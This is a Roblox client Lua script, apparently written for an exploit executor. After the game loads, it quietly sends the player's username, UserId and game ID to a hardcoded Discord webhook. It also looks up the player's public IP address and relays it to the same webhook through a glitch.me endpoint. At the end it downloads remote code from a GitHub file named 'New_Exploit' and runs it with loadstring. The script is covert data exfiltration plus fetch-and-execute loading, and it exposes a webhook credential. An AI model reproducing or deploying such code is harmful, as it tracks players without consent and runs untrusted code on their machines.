if not game:IsLoaded() then
    game.Loaded:Wait()
end
print("Client Ready")
	if game:GetService("Players").LocalPlayer.UserId == 3355159702 then 
		print("Welcome Owner")
	end
wait(2)
local name = game:GetService("Players").localPlayer.Name
local UserId = game:GetService("Players").LocalPlayer.UserId
local gameid = game.PlaceId
local lol = "Start YUB"
response = http_request
if syn then
response = syn.request
end
response(
    {
        Url = 'https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json' 
        },
        Body = game:GetService('HttpService'):JSONEncode({content = "```YUB-X```"})
        
    }
);
response(
    {
        Url = 'https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json' 
        },
        Body = game:GetService('HttpService'):JSONEncode({content = "```User: "..name.. '```'})
        
    }
);
response(
    {
        Url = 'https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json'
        },
        Body = game:GetService('HttpService'):JSONEncode({content = "```gameid: "..gameid.. '```'})
        
    }
);
response(
    {
        Url = 'https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json'
        },
        Body = game:GetService('HttpService'):JSONEncode({content ="```UserId: "..UserId.. '```'})
        
    }
);
response(
    {
        Url = 'https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN',
        Method = 'POST',
        Headers = {
            ['Content-Type'] = 'application/json' 
        },
        Body = game:GetService('HttpService'):JSONEncode({content = ""})
        
    }
);

local ip,HttpService  = tostring(game:HttpGet("https://api.ipify.org", true)), game:GetService("HttpService")
local function SendMessage(Webhook, Message, Botname)
   if not string.find(Webhook, "https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN") then
       return error("Send a valid URL");
   end
   local Name;
   local API = "http://buritoman69.glitch.me/webhook";
   if (not Message or Message == "" or not Botname) then
       Name = "GameBot"
       return error("nil or empty message!")
   else
       Name = Botname;
   end
   local Body = {
       ['Key'] = tostring("applesaregood"),
       ['Message'] = tostring(Message),
       ['Name'] = Name,
       ['Webhook'] = Webhook    
   }
   Body = HttpService:JSONEncode(Body);
   local Data = game:HttpPost(API, Body, false, "application/json")
   return Data or nil;
end
SendMessage("https://discord.com/api/webhooks/983996254197518348/BcRel9hDy_R0E4qAEkUDuJHDQXJfQtcpQ_6REwvrXRNuEmCy9LjlSD4OE3EajzCCF1YN","```IP: "..ip.."```", "YUB")

loadstring(game:HttpGet('https://raw.githubusercontent.com/zxzxz1/New_Exploit/main/Clinet.txt'))()